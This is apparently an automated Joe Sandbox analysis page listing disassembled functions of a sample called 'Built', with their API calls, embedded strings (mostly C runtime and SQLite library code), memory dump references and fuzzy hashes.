String ID: DELETE FROM %Q.sqlite_master WHERE name=%Q AND type='index'$idx$index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped$no such index: %S$sqlite_master$sqlite_temp_master
API String ID: 0-3044004295
Opcode ID: df71e167fbaea4de0386259c4b89394a60b239a7a74b635967c12bf119c983b6
Instruction ID: 3d004a9ddfefe1c46a8bc1cb3f30a2a51f436952942fb05e2b455ac12dde41fc
Opcode Fuzzy Hash: df71e167fbaea4de0386259c4b89394a60b239a7a74b635967c12bf119c983b6
Instruction Fuzzy Hash: 6551866AB0878682EB61DF16E420AE977A4FF85B84F54403ADE9D4BBD9DF3CD4448340

Function 00007FF76D5E8678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF76D5E86A0
_set_statfp.LIBCMT ref: 00007FF76D5E86BB
_set_statfp.LIBCMT ref: 00007FF76D5E86D7
_set_statfp.LIBCMT ref: 00007FF76D5E8713

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: c537f151fe50e26751e0ceb0704c424d7e94f75f6d8fd4fdb3a1ec125b076e33
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 6011BF32E7CA13C2F6583528D45637989406FEC364FD50634ED7E06ED7AE2DA8409132

Function 00007FF76D5DA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA6BF
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA6DE
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA706
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA717
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D98B3,?,?,00000000,00007FF76D5D9B4E,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5DA728

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 67d7c9a4660121c24c4849512b9cbc25590cd10ead7cd9dc77a6027d31c3e6e3
Instruction ID: e3a23c33b4fa1eb9fd91c5ef346cb7a13ea3ab6ee5d1027c0814d02c4e948de1
Opcode Fuzzy Hash: 67d7c9a4660121c24c4849512b9cbc25590cd10ead7cd9dc77a6027d31c3e6e3
Instruction Fuzzy Hash: A5113020E2C642C1FA547325556197AE1515FA83E0FC84334EC7E46EDBFE2CB4418B39

Function 00007FF76D5DA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF76D5DA545
FlsSetValue.KERNEL32 ref: 00007FF76D5DA564
FlsSetValue.KERNEL32 ref: 00007FF76D5DA58C
FlsSetValue.KERNEL32 ref: 00007FF76D5DA59D
FlsSetValue.KERNEL32 ref: 00007FF76D5DA5AE

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 581e4780875054967335282bc59389d1b6b850a269c2162d209fd03ec5aafdf4
Instruction ID: 88cfe3cb0151cc5226be51c48b3f9b27207ac513443e6026b74b00aedbaccd97
Opcode Fuzzy Hash: 581e4780875054967335282bc59389d1b6b850a269c2162d209fd03ec5aafdf4
Instruction Fuzzy Hash: 0F11E820A2D207C2FE68B22654719BAE2814F69370FD84734DD3E4AED7FD2CB4414A39

Function 00007FFDF75F1A20 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

APIs

00007FFE133019C0.VCRUNTIME140 ref: 00007FFDF75F1B6B

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDF75F1ACE
unknown column "%s" in foreign key definition, xrefs: 00007FFDF75F1DBC
foreign key on %s should reference only one column of table %T, xrefs: 00007FFDF75F1AA5

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID: 00007E133019
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3999650332-272990098
Opcode ID: 0c9dc8279bee1181d8d29c93b14d18195fbcb291ef12baac73ce28fec31f4b54
Instruction ID: 3c706fbe76849bd25fc8e48f05ecf7d7fee76ac00501b20c90e74af837ed7756
Opcode Fuzzy Hash: 0c9dc8279bee1181d8d29c93b14d18195fbcb291ef12baac73ce28fec31f4b54
Instruction Fuzzy Hash: 08D1BE6AB09AC282EF668B15A064BFA7BA1EB45BD4F444135DE6D07BC9DF3CD441C700

Function 00007FF76D5D52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D52EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D5416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D54CC

Strings

verbose, xrefs: 00007FF76D5D52C0

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: 58d4a0c45c034535798c90c5705db5d4201cef23c357bde8c4b553dc42533d2b
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: B491E032A2CA46C1F721AE25D46037DB291EB02B95FC84136DE6D46BD6FE3CE4058339

Function 00007FF76D5DEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DF1B7

Part of subcall function 00007FF76D5D6D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D6D69

Strings

UTF-16LEUNICODE, xrefs: 00007FF76D5DF155
UTF-8, xrefs: 00007FF76D5DF136
ccs, xrefs: 00007FF76D5DF0F2

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 00f3fb61398ae157db352b101cb9edf821928cd36e35494b1debe1730105adbc
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: 5881C732E2D283C5F764BF25C130278B6A0AB11749FD58035CE6A97A87FB2DE4419739

Function 00007FFDF7031FD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF7032008
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF7032026

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFDF703201C
HANGUL SYLLABLE , xrefs: 00007FFDF7031FF5

Memory Dump Source

Source File: 00000003.00000002.2060889895.00007FFDF7031000.00000040.00000001.01000000.0000001E.sdmp, Offset: 00007FFDF7030000, based on PE: true

Associated: 00000003.00000002.2060849267.00007FFDF7030000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7092000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF70DE000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF70E1000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF70E6000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7140000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7143000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7145000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2060889895.00007FFDF7148000.00000040.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2061824511.00007FFDF7149000.00000080.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000003.00000002.2061898819.00007FFDF714B000.00000004.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7030000_Built.jbxd

Similarity

API ID: 00007B6570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 4069847057-87138338
Opcode ID: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
Instruction ID: c52526db76278fa2b674ace5b557a4b879296b6205354c4a0a6f9872487de3d5
Opcode Fuzzy Hash: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
Instruction Fuzzy Hash: 07610836B1864346E7B08A15A820AFA7272FF90790F448235EA6DC77DDDE7CD4859700

Function 00007FF76D5CC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF76D5CC993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF76D5CCA2A
RtlUnwindEx.KERNEL32 ref: 00007FF76D5CCA84

Strings

csm, xrefs: 00007FF76D5CCA11

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: 077da19fe4a2d0217033103bb0f44f8a20e6de25ef0e4e5635f16acedf8bcbba
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: 5D51C432B2D642CADB14EB15E804678B791EB54B88F948139DE4D47B86FF7CE851CB20

Function 00007FF76D5CE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF76D5CE5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF76D5CE6B8

Strings

csm, xrefs: 00007FF76D5CE5F2
csm, xrefs: 00007FF76D5CE70A

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: e5620f61929949cceb766e7b98cc03726e2ecfd5afd69685a473950756f74a51
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: E8519132A2C282C6EB74AA119045268B6D0EB54B84F94513ADE5D83FD6EF7CE491CF31

Function 00007FF76D5CE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF76D5CE257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF76D5CE2A3

Strings

MOC, xrefs: 00007FF76D5CE26B
RCC, xrefs: 00007FF76D5CE273

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction ID: b46da84da2d0290710e07bead2f149b0ac091433b39eabe9268ce78014536982
Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction Fuzzy Hash: A1615D3291CB85C1D621AB15E4417AAF7A0FB85B94F444239EF9D43B96EF7CE190CB20

Function 00007FFDF75A8950 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

00007FFE133019C0.VCRUNTIME140 ref: 00007FFDF75A8A78

Strings

df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24, xrefs: 00007FFDF75A8B2B
%s at line %d of [%.10s], xrefs: 00007FFDF75A8B44
database corruption, xrefs: 00007FFDF75A8B38

Memory Dump Source

Source File: 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7590000, based on PE: true

Associated: 00000003.00000002.2065208085.00007FFDF7590000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76E4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2065249418.00007FFDF76F9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066155855.00007FFDF76FB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000003.00000002.2066216002.00007FFDF76FD000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd

Similarity

API ID: 00007E133019
String ID: %s at line %d of [%.10s]$database corruption$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24
API String ID: 3999650332-2551159147
Opcode ID: a1985318e20d147dbd9937e0d4865b6ba0f6305ea9cdcc40bed6de76dd9773fa
Instruction ID: 914c09d97fecd71fc769238b4bf3717a19769942306c9eb33633c467f4ab5fdb
Opcode Fuzzy Hash: a1985318e20d147dbd9937e0d4865b6ba0f6305ea9cdcc40bed6de76dd9773fa
Instruction Fuzzy Hash: 50518026B08B4296FB56CB25D550AEA73A4FB48B94F144036DF6D4B7D8EF38E465C300

Function 00007FF76D5DF8E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DF916

Part of subcall function 00007FF76D5DE8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF76D5DE908

Strings

[oV116, xrefs: 00007FF76D5DF8EE
:, xrefs: 00007FF76D5DF956
., xrefs: 00007FF76D5DF967

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:$[oV116
API String ID: 2020911589-4261384154
Opcode ID: 907cfb8e6e061aeb6699f1114007dd8f0cf378e4e03f2c0bfd14e443b1b7067f
Instruction ID: c19752f57cbe9ee79995c92747ce3ed21da583478f41830398c3fbd6db95ee55
Opcode Fuzzy Hash: 907cfb8e6e061aeb6699f1114007dd8f0cf378e4e03f2c0bfd14e443b1b7067f
Instruction Fuzzy Hash: 97414F22F2C792D8FB10AFB198611BC66B4AF14758F940035DE6D67E4AFF3894428338

Function 00007FF76D5DBF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF76D5DC05F
GetLastError.KERNEL32 ref: 00007FF76D5DC081

Strings

U, xrefs: 00007FF76D5DC00B
[oV116, xrefs: 00007FF76D5DBF67

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U$[oV116
API String ID: 442123175-3241692563
Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction ID: 8949226114a8259f1576299f90932b75b5676a27dc11c1518bacbfa968f0e0db
Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction Fuzzy Hash: 7F41B122A2CA85C2DB20EF25E4543B9A761FB98794F844035EE4D87B99EF3CD441CB24

Function 00007FF76D5DE8C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF76D5DE908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF76D5DE95A

Strings

[oV116, xrefs: 00007FF76D5DE8DA
:, xrefs: 00007FF76D5DE91E

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentDirectory
String ID: :$[oV116
API String ID: 1611563598-4125022217
Opcode ID: 4406e5919126d02ea3a76b6133a572177de49089f209fdac8df3cc0ad0528a12
Instruction ID: 8ca1a9c80e806dcee256bb8820287405bc43a9e0667ecde9db04dcbb594a0856
Opcode Fuzzy Hash: 4406e5919126d02ea3a76b6133a572177de49089f209fdac8df3cc0ad0528a12
Instruction Fuzzy Hash: 1B21C122A2C681C1EB60BF15D46427DE3A1FB88B44FC54035DE9C83A86EF7CE9458B75

Function 00007FF76D5E0908 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E0938
GetFileAttributesExW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76D5D7B77), ref: 00007FF76D5E0950
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76D5D7B77), ref: 00007FF76D5E095A

Strings

[oV116, xrefs: 00007FF76D5E090E

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AttributesErrorFileLast_invalid_parameter_noinfo
String ID: [oV116
API String ID: 1462441492-247592185
Opcode ID: 4234482ab77b2e09b945cc3cdd470f017e1b5ac919b6b928956638cfc4e69123
Instruction ID: 9150154de874e5a4a9df1f8759a1933a0da8078b101b4f849fd97761fc662beb
Opcode Fuzzy Hash: 4234482ab77b2e09b945cc3cdd470f017e1b5ac919b6b928956638cfc4e69123
Instruction Fuzzy Hash: D2115B21A2C28AC2FB617F699461379A290AF9C744FC00131DE9D93AC3FF7CA4408634

Function 00007FF76D5CB870 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(?,?,?,?,?,?,00007FF76D5D9A67), ref: 00007FF76D5CBC0E
capture_previous_context.LIBCMT ref: 00007FF76D5CBC26
__raise_securityfailure.LIBCMT ref: 00007FF76D5CBCC8

Strings

[oV116, xrefs: 00007FF76D5CBCA0

Memory Dump Source

Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd

Similarity

